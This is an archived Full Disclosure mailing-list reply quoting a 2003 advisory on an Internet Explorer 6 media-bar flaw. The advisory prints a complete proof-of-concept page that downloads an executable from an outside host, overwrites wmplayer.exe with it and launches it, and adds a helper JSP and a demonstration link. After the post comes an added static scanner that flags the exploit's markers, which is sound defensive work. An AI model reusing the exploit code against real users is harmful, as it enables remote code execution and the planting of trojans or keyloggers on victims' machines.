Full Disclosure mailing list archives
Re: Internet explorer 6 on windows XP allows exection of arbitrary code
From: "Dj MegaWorld" <info () djmegaworld nl>
Date: Fri, 12 Sep 2003 23:56:56 +0200
Same problem occurs on windows 2000 and windows 2003 server...

Greetings,
Dj MegaWorld / Marius van Witzenburg
"It's the music... That never fades!"
Url: http://www.djmegaworld.nl/

----- Original Message -----
From: "jelmer" <jkuperus () planet nl>
To: <bugtraq () securityfocus com>
Cc: <full-disclosure () lists netsys com>
Sent: Friday, September 12, 2003 0:31
Subject: Internet explorer 6 on windows XP allows exection of arbitrary code

Internet explorer 6 on windows XP allows execution of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a series of advisories concerning internet explorer. By combining one of these issues with an earlier issue I myself reported a while back, you can construct a specially crafted webpage that can take any action on a user's system including, but not limited to, installing trojans, keyloggers, wiping the user's hard drive etc.

TECHNICAL EXPLANATION :

Internet explorer 6 comes with a media sidebar in which you can load and play media clips without even leaving the browser. When you instruct the media bar to load a file from an unknown host, or the HTTP status returned by an existing host indicates an error, this media bar displays an error page inside the media bar, namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URLs are treated as being in the "my computer zone" and are loaded from the user's filesystem: perfect conditions for the issue I describe on

http://www.mail-archive.com/full-disclosure () lists netsys com/msg06791.html

to work.

Now all that is needed is a way to inject this exploit code into this page. This method was graciously provided by Liu Die Yu, as you can read on

http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--

<textarea id="code" style="display:none;">
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
</textarea>

<script language="javascript">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {
            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");
            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")
    }

    window.open("error.jsp","_media");
    setTimeout("doit()", 5000);
</script>

--snip--

error.jsp is a jsp page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>

DEMONSTRATION :

A demonstration is provided at :

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

WORKAROUND :

Disable active scripting or do "the sensible thing" and pick another browser such as the excellent mozilla firebird.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
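
The advisory quoted above relies on markers that are visible in page source: a window.open call targeting "_media", a file:javascript: URL, a res:// reference, and ADODB.Stream used with SaveToFile. A static triage check for those markers, as an added example that is not part of the original post or thread; the indicator ids, verdict names and sample strings are constructed for illustration:

```javascript
// Added example: static triage of page source for the markers named in the
// advisory. Indicator ids and verdict names are assumptions of this example.
const INDICATORS = [
  { id: "media-target", re: /window\.open\s*\([^)]*["']_media["']/i },
  { id: "script-in-file-url", re: /file:\s*javascript:/i },
  { id: "res-url", re: /res:\/\/[^"'\s<>]+\.dll\//i },
  { id: "adodb-stream", re: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']/i },
  { id: "save-to-file", re: /\.SaveToFile\s*\(/i },
];

// Undo cheap obfuscation before matching: numeric HTML entities, %XX escapes,
// and string literals split with "+" concatenation.
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
function normalize(src) {
  return src
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/["']\s*\+\s*["']/g, "");
}

// "block" when the media bar is navigated together with a script-bearing file:
// URL, or when ADODB.Stream is used to write a file; any lone marker is "review".
function scan(src) {
  const text = normalize(src);
  const hits = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.id);
  const has = (id) => hits.includes(id);
  let verdict = hits.length ? "review" : "clean";
  if ((has("media-target") && has("script-in-file-url")) ||
      (has("adodb-stream") && has("save-to-file"))) {
    verdict = "block";
  }
  return { verdict, hits };
}

// Constructed samples (inert marker strings, not taken from real traffic).
const SAMPLE_SPLIT = [
  "<script>",
  'var u = "fi" + "le:java" + "script:eval(0)";',
  'window.open(u, "_media");',
  "</script>",
].join("\n");
const SAMPLE_MEDIA_ONLY = '<script>window.open("clip.wmv", "_media");</script>';

console.log(scan(SAMPLE_SPLIT));      // both markers present after normalization
console.log(scan(SAMPLE_MEDIA_ONLY)); // legitimate media bar use still gets a look
```

A lone "_media" navigation is only flagged for review because the media bar also has legitimate uses; the verdict escalates only on the combinations the advisory depends on.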
Current thread:
- Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Kristian Hermansen (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Thor Larholm (Sep 11)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Dj MegaWorld (Sep 12)
- <Possible follow-ups>
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code http-equiv () excite com (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Drew Copley (Sep 12)